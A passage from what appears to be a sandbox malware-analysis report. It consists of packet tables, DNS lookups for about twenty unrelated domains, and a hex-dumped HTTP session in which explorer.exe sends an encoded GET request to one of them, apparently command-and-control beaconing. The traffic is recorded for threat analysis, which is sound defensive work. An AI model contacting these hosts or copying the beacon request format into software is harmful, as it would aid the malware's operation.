                                                                      Jun 5, 2022 13:07:05.906806946 CEST4994480192.168.2.562.149.128.40
                                                                      Jun 5, 2022 13:07:05.906966925 CEST4994480192.168.2.562.149.128.40
                                                                      Jun 5, 2022 13:07:05.938211918 CEST804994462.149.128.40192.168.2.5
                                                                      Jun 5, 2022 13:07:05.938288927 CEST804994462.149.128.40192.168.2.5
                                                                      Jun 5, 2022 13:07:05.938325882 CEST804994462.149.128.40192.168.2.5
                                                                      Jun 5, 2022 13:07:05.938364983 CEST804994462.149.128.40192.168.2.5
                                                                      Jun 5, 2022 13:07:05.938436031 CEST4994480192.168.2.562.149.128.40
                                                                      Jun 5, 2022 13:07:05.938572884 CEST4994480192.168.2.562.149.128.40
                                                                      Jun 5, 2022 13:07:05.938678026 CEST4994480192.168.2.562.149.128.40
                                                                      Jun 5, 2022 13:07:05.968251944 CEST804994462.149.128.40192.168.2.5
                                                                      Jun 5, 2022 13:07:11.010543108 CEST4994680192.168.2.523.227.38.74
                                                                      Jun 5, 2022 13:07:11.027107954 CEST804994623.227.38.74192.168.2.5
                                                                      Jun 5, 2022 13:07:11.027468920 CEST4994680192.168.2.523.227.38.74
                                                                      Jun 5, 2022 13:07:11.028254986 CEST4994680192.168.2.523.227.38.74
                                                                      Jun 5, 2022 13:07:11.044687033 CEST804994623.227.38.74192.168.2.5
                                                                      Jun 5, 2022 13:07:11.076240063 CEST804994623.227.38.74192.168.2.5
                                                                      Jun 5, 2022 13:07:11.076294899 CEST804994623.227.38.74192.168.2.5
                                                                      Jun 5, 2022 13:07:11.076338053 CEST804994623.227.38.74192.168.2.5
                                                                      Jun 5, 2022 13:07:11.076379061 CEST804994623.227.38.74192.168.2.5
                                                                      Jun 5, 2022 13:07:11.076392889 CEST4994680192.168.2.523.227.38.74
                                                                      Jun 5, 2022 13:07:11.076415062 CEST804994623.227.38.74192.168.2.5
                                                                      Jun 5, 2022 13:07:11.076436996 CEST4994680192.168.2.523.227.38.74
                                                                      Jun 5, 2022 13:07:11.076447010 CEST804994623.227.38.74192.168.2.5
                                                                      Jun 5, 2022 13:07:11.076529026 CEST4994680192.168.2.523.227.38.74
                                                                      Jun 5, 2022 13:07:11.076606989 CEST4994680192.168.2.523.227.38.74
                                                                      Jun 5, 2022 13:07:21.221781015 CEST4994780192.168.2.515.197.142.173
                                                                      Jun 5, 2022 13:07:21.240148067 CEST804994715.197.142.173192.168.2.5
                                                                      Jun 5, 2022 13:07:21.240365982 CEST4994780192.168.2.515.197.142.173
                                                                      Jun 5, 2022 13:07:21.240432024 CEST4994780192.168.2.515.197.142.173
                                                                      Jun 5, 2022 13:07:21.258987904 CEST804994715.197.142.173192.168.2.5
                                                                      Jun 5, 2022 13:07:21.295186043 CEST804994715.197.142.173192.168.2.5
                                                                      Jun 5, 2022 13:07:21.295234919 CEST804994715.197.142.173192.168.2.5
                                                                      Jun 5, 2022 13:07:21.295403004 CEST4994780192.168.2.515.197.142.173
                                                                      Jun 5, 2022 13:07:21.295475006 CEST4994780192.168.2.515.197.142.173
                                                                      Jun 5, 2022 13:07:21.309798002 CEST804994715.197.142.173192.168.2.5
                                                                      Jun 5, 2022 13:07:21.310046911 CEST4994780192.168.2.515.197.142.173
                                                                      Jun 5, 2022 13:07:21.313752890 CEST804994715.197.142.173192.168.2.5
                                                                      Jun 5, 2022 13:07:36.482276917 CEST4995080192.168.2.537.187.131.150
                                                                      Jun 5, 2022 13:07:36.510972023 CEST804995037.187.131.150192.168.2.5
                                                                      Jun 5, 2022 13:07:36.511132002 CEST4995080192.168.2.537.187.131.150
                                                                      Jun 5, 2022 13:07:36.511559963 CEST4995080192.168.2.537.187.131.150
                                                                      Jun 5, 2022 13:07:36.540160894 CEST804995037.187.131.150192.168.2.5
                                                                      Jun 5, 2022 13:07:36.540524960 CEST804995037.187.131.150192.168.2.5
                                                                      Jun 5, 2022 13:07:36.540558100 CEST804995037.187.131.150192.168.2.5
                                                                      Jun 5, 2022 13:07:36.540723085 CEST4995080192.168.2.537.187.131.150
                                                                      Jun 5, 2022 13:07:36.540774107 CEST4995080192.168.2.537.187.131.150
                                                                      Jun 5, 2022 13:07:36.569645882 CEST804995037.187.131.150192.168.2.5
                                                                      Jun 5, 2022 13:07:41.594063997 CEST4995180192.168.2.534.102.136.180
                                                                      Jun 5, 2022 13:07:41.610734940 CEST804995134.102.136.180192.168.2.5
                                                                      Jun 5, 2022 13:07:41.610901117 CEST4995180192.168.2.534.102.136.180
                                                                      Jun 5, 2022 13:07:41.611059904 CEST4995180192.168.2.534.102.136.180
                                                                      Jun 5, 2022 13:07:41.627387047 CEST804995134.102.136.180192.168.2.5
                                                                      Jun 5, 2022 13:07:41.725567102 CEST804995134.102.136.180192.168.2.5
                                                                      Jun 5, 2022 13:07:41.725609064 CEST804995134.102.136.180192.168.2.5
                                                                      Jun 5, 2022 13:07:41.725858927 CEST4995180192.168.2.534.102.136.180
                                                                      Jun 5, 2022 13:07:41.725933075 CEST4995180192.168.2.534.102.136.180
                                                                      Jun 5, 2022 13:07:42.031933069 CEST4995180192.168.2.534.102.136.180
                                                                      Jun 5, 2022 13:07:42.048727036 CEST804995134.102.136.180192.168.2.5
                                                                      Jun 5, 2022 13:07:57.170298100 CEST4995280192.168.2.534.102.136.180
                                                                      Jun 5, 2022 13:07:57.188617945 CEST804995234.102.136.180192.168.2.5
                                                                      Jun 5, 2022 13:07:57.188739061 CEST4995280192.168.2.534.102.136.180
                                                                      Jun 5, 2022 13:07:57.188816071 CEST4995280192.168.2.534.102.136.180
                                                                      Jun 5, 2022 13:07:57.207205057 CEST804995234.102.136.180192.168.2.5
                                                                      Jun 5, 2022 13:07:57.303291082 CEST804995234.102.136.180192.168.2.5
                                                                      Jun 5, 2022 13:07:57.303345919 CEST804995234.102.136.180192.168.2.5
                                                                      Jun 5, 2022 13:07:57.303530931 CEST4995280192.168.2.534.102.136.180
                                                                      Jun 5, 2022 13:07:57.305322886 CEST4995280192.168.2.534.102.136.180
                                                                      Jun 5, 2022 13:07:57.321738005 CEST804995234.102.136.180192.168.2.5
                                                                      Jun 5, 2022 13:08:03.435348034 CEST4995380192.168.2.543.240.146.175
                                                                      Jun 5, 2022 13:08:06.440171003 CEST4995380192.168.2.543.240.146.175
                                                                      Jun 5, 2022 13:08:12.441143990 CEST4995380192.168.2.543.240.146.175

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jun 5, 2022 13:05:41.436739922 CEST5712753192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:05:41.548950911 CEST53571278.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:05:47.120119095 CEST5678453192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:05:47.298316002 CEST53567848.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:05:52.637298107 CEST4990153192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:05:52.750922918 CEST53499018.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:06:16.855475903 CEST6548753192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:06:16.874540091 CEST53654878.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:06:18.834119081 CEST5211353192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:06:18.861352921 CEST53521138.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:06:23.874798059 CEST5206153192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:06:23.896775007 CEST53520618.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:06:28.914705038 CEST6396753192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:06:28.968533993 CEST53639678.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:06:34.115746021 CEST5225653192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:06:34.135343075 CEST53522568.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:06:39.684077978 CEST5920253192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:06:39.732115984 CEST53592028.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:06:44.874587059 CEST5589753192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:06:45.246172905 CEST53558978.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:06:55.305519104 CEST5052753192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:06:55.342350960 CEST53505278.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:07:00.787316084 CEST6200553192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:07:00.809170008 CEST53620058.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:07:05.829567909 CEST5060053192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:07:05.875644922 CEST53506008.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:07:10.973774910 CEST6469453192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:07:11.008373022 CEST53646948.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:07:16.127999067 CEST5213453192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:07:16.158875942 CEST53521348.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:07:21.197309971 CEST5477353192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:07:21.220626116 CEST53547738.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:07:36.459592104 CEST5308953192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:07:36.481148958 CEST53530898.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:07:41.558450937 CEST5231853192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:07:41.592410088 CEST53523188.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:07:46.739737034 CEST5048053192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:07:46.902843952 CEST53504808.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:07:51.933854103 CEST5608453192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:07:52.132220030 CEST53560848.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:07:57.148365021 CEST5128953192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:07:57.169430017 CEST53512898.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:08:02.421372890 CEST5885053192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:08:02.441983938 CEST53588508.8.8.8192.168.2.5
                                                                      Jun 5, 2022 13:08:26.090637922 CEST5122553192.168.2.58.8.8.8
                                                                      Jun 5, 2022 13:08:26.125031948 CEST53512258.8.8.8192.168.2.5

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Jun 5, 2022 13:05:41.436739922 CEST192.168.2.58.8.8.80x51f6Standard query (0)www.tubesing.comA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:05:47.120119095 CEST192.168.2.58.8.8.80xd8c1Standard query (0)www.ccav11.xyzA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:05:52.637298107 CEST192.168.2.58.8.8.80x7405Standard query (0)www.mftie.comA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:16.855475903 CEST192.168.2.58.8.8.80x2b58Standard query (0)www.mftie.comA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:18.834119081 CEST192.168.2.58.8.8.80x72d3Standard query (0)www.salahov.infoA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:23.874798059 CEST192.168.2.58.8.8.80x3adaStandard query (0)www.travisjbogard.comA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:28.914705038 CEST192.168.2.58.8.8.80x6373Standard query (0)www.skb-cabinet.comA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:34.115746021 CEST192.168.2.58.8.8.80x7be0Standard query (0)www.garglimited.comA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:39.684077978 CEST192.168.2.58.8.8.80x3066Standard query (0)www.mentalnayaarifmetika.onlineA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:44.874587059 CEST192.168.2.58.8.8.80x5229Standard query (0)www.muktobangla.xyzA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:55.305519104 CEST192.168.2.58.8.8.80x39b7Standard query (0)www.exceedrigging.onlineA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:00.787316084 CEST192.168.2.58.8.8.80x108fStandard query (0)www.christineenergy.comA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:05.829567909 CEST192.168.2.58.8.8.80xd90Standard query (0)www.ageofcryptos.comA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:10.973774910 CEST192.168.2.58.8.8.80xf5d1Standard query (0)www.tahnforest.comA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:16.127999067 CEST192.168.2.58.8.8.80x8c4eStandard query (0)www.myamazonloan.netA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:21.197309971 CEST192.168.2.58.8.8.80xd6feStandard query (0)www.american-atlantic.netA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:36.459592104 CEST192.168.2.58.8.8.80xe045Standard query (0)www.14offresimportantes.comA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:41.558450937 CEST192.168.2.58.8.8.80xffe7Standard query (0)www.nagpurmandarin.comA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:46.739737034 CEST192.168.2.58.8.8.80x3d17Standard query (0)www.demetbatmaz.comA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:51.933854103 CEST192.168.2.58.8.8.80xf24fStandard query (0)www.edisson-bd.comA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:57.148365021 CEST192.168.2.58.8.8.80xf0cfStandard query (0)www.engroconnect.netA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:08:02.421372890 CEST192.168.2.58.8.8.80x3082Standard query (0)www.tellgalpy.comA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:08:26.090637922 CEST192.168.2.58.8.8.80xb059Standard query (0)www.tellgalpy.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Jun 5, 2022 13:05:41.548950911 CEST8.8.8.8192.168.2.50x51f6No error (0)www.tubesing.comtubesing.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 5, 2022 13:05:41.548950911 CEST8.8.8.8192.168.2.50x51f6No error (0)tubesing.com162.241.253.231A (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:05:47.298316002 CEST8.8.8.8192.168.2.50xd8c1No error (0)www.ccav11.xyz35.201.101.222A (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:05:52.750922918 CEST8.8.8.8192.168.2.50x7405No error (0)www.mftie.com23.80.123.107A (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:16.874540091 CEST8.8.8.8192.168.2.50x2b58No error (0)www.mftie.com23.80.123.107A (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:18.861352921 CEST8.8.8.8192.168.2.50x72d3Name error (3)www.salahov.infononenoneA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:23.896775007 CEST8.8.8.8192.168.2.50x3adaName error (3)www.travisjbogard.comnonenoneA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:28.968533993 CEST8.8.8.8192.168.2.50x6373No error (0)www.skb-cabinet.com185.129.100.127A (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:34.135343075 CEST8.8.8.8192.168.2.50x7be0Name error (3)www.garglimited.comnonenoneA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:39.732115984 CEST8.8.8.8192.168.2.50x3066No error (0)www.mentalnayaarifmetika.online185.68.16.179A (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:45.246172905 CEST8.8.8.8192.168.2.50x5229Server failure (2)www.muktobangla.xyznonenoneA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:06:55.342350960 CEST8.8.8.8192.168.2.50x39b7No error (0)www.exceedrigging.online203.170.80.250A (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:00.809170008 CEST8.8.8.8192.168.2.50x108fName error (3)www.christineenergy.comnonenoneA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:05.875644922 CEST8.8.8.8192.168.2.50xd90No error (0)www.ageofcryptos.comageofcryptos.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 5, 2022 13:07:05.875644922 CEST8.8.8.8192.168.2.50xd90No error (0)ageofcryptos.com62.149.128.40A (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:11.008373022 CEST8.8.8.8192.168.2.50xf5d1No error (0)www.tahnforest.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 5, 2022 13:07:11.008373022 CEST8.8.8.8192.168.2.50xf5d1No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:16.158875942 CEST8.8.8.8192.168.2.50x8c4eName error (3)www.myamazonloan.netnonenoneA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:21.220626116 CEST8.8.8.8192.168.2.50xd6feNo error (0)www.american-atlantic.netamerican-atlantic.netCNAME (Canonical name)IN (0x0001)
                                                                      Jun 5, 2022 13:07:21.220626116 CEST8.8.8.8192.168.2.50xd6feNo error (0)american-atlantic.net15.197.142.173A (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:21.220626116 CEST8.8.8.8192.168.2.50xd6feNo error (0)american-atlantic.net3.33.152.147A (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:36.481148958 CEST8.8.8.8192.168.2.50xe045No error (0)www.14offresimportantes.com14offresimportantes.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 5, 2022 13:07:36.481148958 CEST8.8.8.8192.168.2.50xe045No error (0)14offresimportantes.com37.187.131.150A (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:41.592410088 CEST8.8.8.8192.168.2.50xffe7No error (0)www.nagpurmandarin.comnagpurmandarin.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 5, 2022 13:07:41.592410088 CEST8.8.8.8192.168.2.50xffe7No error (0)nagpurmandarin.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:46.902843952 CEST8.8.8.8192.168.2.50x3d17Server failure (2)www.demetbatmaz.comnonenoneA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:52.132220030 CEST8.8.8.8192.168.2.50xf24fName error (3)www.edisson-bd.comnonenoneA (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:07:57.169430017 CEST8.8.8.8192.168.2.50xf0cfNo error (0)www.engroconnect.netengroconnect.netCNAME (Canonical name)IN (0x0001)
                                                                      Jun 5, 2022 13:07:57.169430017 CEST8.8.8.8192.168.2.50xf0cfNo error (0)engroconnect.net34.102.136.180A (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:08:02.441983938 CEST8.8.8.8192.168.2.50x3082No error (0)www.tellgalpy.comtellgalpy.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 5, 2022 13:08:02.441983938 CEST8.8.8.8192.168.2.50x3082No error (0)tellgalpy.com43.240.146.175A (IP address)IN (0x0001)
                                                                      Jun 5, 2022 13:08:26.125031948 CEST8.8.8.8192.168.2.50xb059No error (0)www.tellgalpy.comtellgalpy.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 5, 2022 13:08:26.125031948 CEST8.8.8.8192.168.2.50xb059No error (0)tellgalpy.com43.240.146.175A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.tubesing.com
                                                                      • www.ccav11.xyz
                                                                      • www.skb-cabinet.com
                                                                      • www.mentalnayaarifmetika.online
                                                                      • www.exceedrigging.online
                                                                      • www.ageofcryptos.com
                                                                      • www.tahnforest.com
                                                                      • www.american-atlantic.net
                                                                      • www.14offresimportantes.com
                                                                      • www.nagpurmandarin.com
                                                                      • www.engroconnect.net

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.549854162.241.253.23180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 5, 2022 13:05:41.704787970 CEST9275OUTGET /ocgr/?8p=qVwdVxLX0&1bEX=9V0bXTkkxKWxDgp6RJOks70x/YcJP31kraxWgvuUzaENE/wb1OUHkodtz4WPL0DBPwKx HTTP/1.1
                                                                      Host: www.tubesing.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 5, 2022 13:05:42.100227118 CEST9276INHTTP/1.1 404 Not Found
                                                                      Date: Sun, 05 Jun 2022 11:05:42 GMT
                                                                      Server: nginx/1.19.10
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      Vary: Accept-Encoding
                                                                      host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                      X-Endurance-Cache-Level: 2
                                                                      Transfer-Encoding: chunked
                                                                      Data Raw: 31 38 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 0a 09 09 09 57 65 6c 63 6f 6d 65 20 26 6d 64 61 73 68 3b 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 09 09 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 0a 09 09 09 73 72 63 3d 22 68 74 74 70 3a 2f 2f 32 62 73 69 6e 67 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 68 74 74 70 3a 2f 2f 32 62 73 69 6e 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 62 6c 75 65 68 6f 73 74 2d 77 6f 72 64 70 72 65 73 73 2d 70 6c 75 67 69 6e 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 63 73 2d 62 6c 75 65 68 6f 73 74 2d 62 67 2e 6a 70 67 22 29 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 74 6f 70 20 72 69 67 68 74 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 09 09 09 7d 0a 0a 09 09 09 2a 20 7b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 09 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 69 6e 70 75 74 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 7d 0a 0a 09 09 09 3a 3a 2d 77 65 62 6b 69 74 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 39 44 41 46 42 44 3b 0a 09 09 09 7d 0a 0a 09 09 09 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 39 44 41 46 42 44 3b 0a 09 09 09 7d 0a 0a 09 09 09 3a 2d 6d 73 2d 69 6e
                                                                      Data Ascii: 18d0<!DOCTYPE html><html lang="en-US"><head><meta name="viewport" content="width=device-width"><title>Welcome &mdash; Coming Soon</title><meta name="robots" content="noindex, nofollow" /><scriptsrc="http://2bsing.com/wp-includes/js/jquery/jquery.js"></script><link href="https://fonts.googleapis.com/css?family=Open+Sans:400,600" rel="stylesheet"><style type="text/css">body {background-color: #fff;background-image: url("http://2bsing.com/wp-content/plugins/bluehost-wordpress-plugin/static/images/cs-bluehost-bg.jpg");background-position: top right;background-repeat: no-repeat;font-family: "Open Sans", sans-serif;overflow-x: hidden;}* {box-sizing: border-box;-moz-box-sizing: border-box;-webkit-box-sizing: border-box;}input {font-family: "Open Sans", sans-serif;}::-webkit-input-placeholder {color: #9DAFBD;}::-moz-placeholder {color: #9DAFBD;}:-ms-in
                                                                      Jun 5, 2022 13:05:42.100255013 CEST9277INData Raw: 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 39 44 41 46 42 44 3b 0a 09 09 09 7d 0a 0a 09 09 09 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 39 44 41
                                                                      Data Ascii: put-placeholder {color: #9DAFBD;}:-moz-placeholder {color: #9DAFBD;}#wrap {max-width: 560px;margin: 320px auto 120px;color: #444;text-align: center;}#wrap h1 {font-weight: 300;
                                                                      Jun 5, 2022 13:05:42.100271940 CEST9279INData Raw: 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 62 74 6e 3a 68 6f 76 65
                                                                      Data Ascii: r-radius: 3px;text-decoration: none;margin-top: 60px;}.btn:hover {border: 1px solid #2e66ba;background-color: #fff;color: #2e66ba;}.bh_subscription_widget {}.bh_subscription_widget h2.widgett
                                                                      Jun 5, 2022 13:05:42.100291014 CEST9280INData Raw: 6f 6e 3a 20 61 6c 6c 20 30 2e 31 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0a 09 09 09 09 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 31 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0a 09 09 09 09 2d 6f 2d 74 72 61 6e 73 69
                                                                      Data Ascii: on: all 0.1s ease-in-out;-moz-transition: all 0.1s ease-in-out;-o-transition: all 0.1s ease-in-out;transition: all 0.1s ease-in-out;}.bh_subscription_widget form .bh-inputs.email.active #bh-subscribe-label {color:
                                                                      Jun 5, 2022 13:05:42.100308895 CEST9281INData Raw: 20 66 6f 72 6d 20 2e 62 68 2d 69 6e 70 75 74 73 2e 73 75 62 6d 69 74 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 35 37 35 44 33 3b 0a 09 09 09 09
                                                                      Data Ascii: form .bh-inputs.submit input[type="submit"] {background-color: #3575D3;border: none;border-radius: 4px;color: #fff;font-size: 14px;font-weight: 600;line-height: 13px;margin: 0;padding: 15px 30px;
                                                                      Jun 5, 2022 13:05:42.100322008 CEST9282INData Raw: 64 67 65 74 20 66 6f 72 6d 0d 0a
                                                                      Data Ascii: dget form
